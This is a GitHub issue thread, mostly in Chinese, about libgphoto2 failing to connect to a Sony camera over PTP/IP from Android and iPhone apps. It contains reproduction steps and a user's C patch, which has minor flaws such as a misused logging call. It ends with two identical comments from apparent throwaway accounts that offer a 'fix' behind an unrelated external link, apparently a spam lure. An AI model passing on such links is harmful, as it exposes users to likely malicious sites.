gphoto/libgphoto2 #1091: 安卓手机应用使用PTPIP连不上照相机

ArvinSpace, 2025-02-18:
**Describe the bug**

PTPIP连不上照相机

**Name the camera**
Sony ILCE-7M3

**libgphoto2 and gphoto2 version**
libgphoto2: 2.5.31
电脑是Windows 11系统
安卓手机 Redmi K40，操作系统 Xiaomi HyperOS 1.0.6.0TKHCNXM，安卓版本 13

**To Reproduce**
步骤：
1. 手机的热点打开
2. 电脑连接手机的热点
3. 使用CMD命令行执行命令arp -a，找到照相机IP是【192.168.18.123】，因为这个IP对应的MAC地址与照相机的相同
4. 电脑断开连接的热点
5. 照相机连接手机的热点
6. 照相机上选择【发送到电脑】，选择卡槽2（卡槽2是存放静态图像的），此时照相机上显示连接的SSID是手机的热点名称
7. 启动应用，应用代码中有手动设置连接的地址是ptpip:192.168.18.123

结果是，PTPIP连不上照相机
调试日志在文件中

可以帮忙看一下吗，谢谢了

[libgphoto2_log_all.log](https://github.com/user-attachments/files/18844823/libgphoto2_log_all.log)

ArvinSpace, 2025-02-25:
我修改了一些代码，然后报错变了，现在报错是`bad type returned 5`

修改代码是：
把这一行的代码
https://github.com/gphoto/libgphoto2/blob/017c24dc1f61e753a166ab081b9ed69cc60b140d/camlibs/ptp2/ptpip.c#L594
改为
```
        do {
            ret = select (params->evtfd+1, &infds, NULL, NULL, &timeout);
        } while (ret == -1 && errno == EINTR);
```

文件中其他地方使用`select`函数的也这样改，然后报错就变为`bad type returned 5`了

现在安卓和iPhone手机应用都尝试了，报一样的错误

iPhone手机是iPhone 15，系统是17.1.2

操作步骤与上面安卓手机调试时一致

请问有遇到过这个报错吗？是照相机的权限还是手机应用的权限或者其他问题呢？

调试日志如下：

[libgphoto2_log_ptpip.log](https://github.com/user-attachments/files/18966064/libgphoto2_log_ptpip.log)

ArvinSpace, 2025-03-06:
已解决

https://github.com/gphoto/libgphoto2/blob/017c24dc1f61e753a166ab081b9ed69cc60b140d/camlibs/ptp2/ptpip.c#L442
改为
`unsigned char	guid[16] = {0};`

----

https://github.com/gphoto/libgphoto2/blob/017c24dc1f61e753a166ab081b9ed69cc60b140d/camlibs/ptp2/ptpip.c#L664
改为
```
void
ptp_nikon_getptpipguid(unsigned char *guid) {
    char buffer[1024];
    int i;
    long val;
    int valid;
    char *endptr;
    char *pos;
    int byte = 16 - 6;
    int leng = byte * 2 + byte - 1;

    gp_setting_get("ptp2_ip", "guid", buffer);

    if (strlen(buffer) == leng) {
        pos = buffer;
        valid = 1;
        for (i = 0; i < byte; i++) {
            val = strtol(pos, &endptr, 16);
            if (((*endptr != ':') && (*endptr != 0)) || (endptr != pos + 2)) {
                valid = 0;
                break;
            }
            guid[i] = (unsigned char) val;
            pos += 3;
        }
        GP_LOG_D("GUID ");
        for (i = 0; i < byte; i++) {
            GP_LOG_D("%02x:", guid[i]);
        }
        GP_LOG_D("\n");
        if (valid)
            return;
    }

    GP_LOG_D(stderr, "Invalid GUID\n");

    /* Generate an ID */
    srand(time(NULL));
    buffer[0] = 0;
    pos = buffer;
    for (i = 0; i < byte; i++) {
        guid[i] = (unsigned char) ((256.0 * rand()) / RAND_MAX);
        pos += sprintf(pos, "%02x:", guid[i]);
    }
    buffer[leng] = 0;

    GP_LOG_D("New GUID: %s\n", buffer);

    gp_setting_set("ptp2_ip", "guid", buffer);
}
```

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)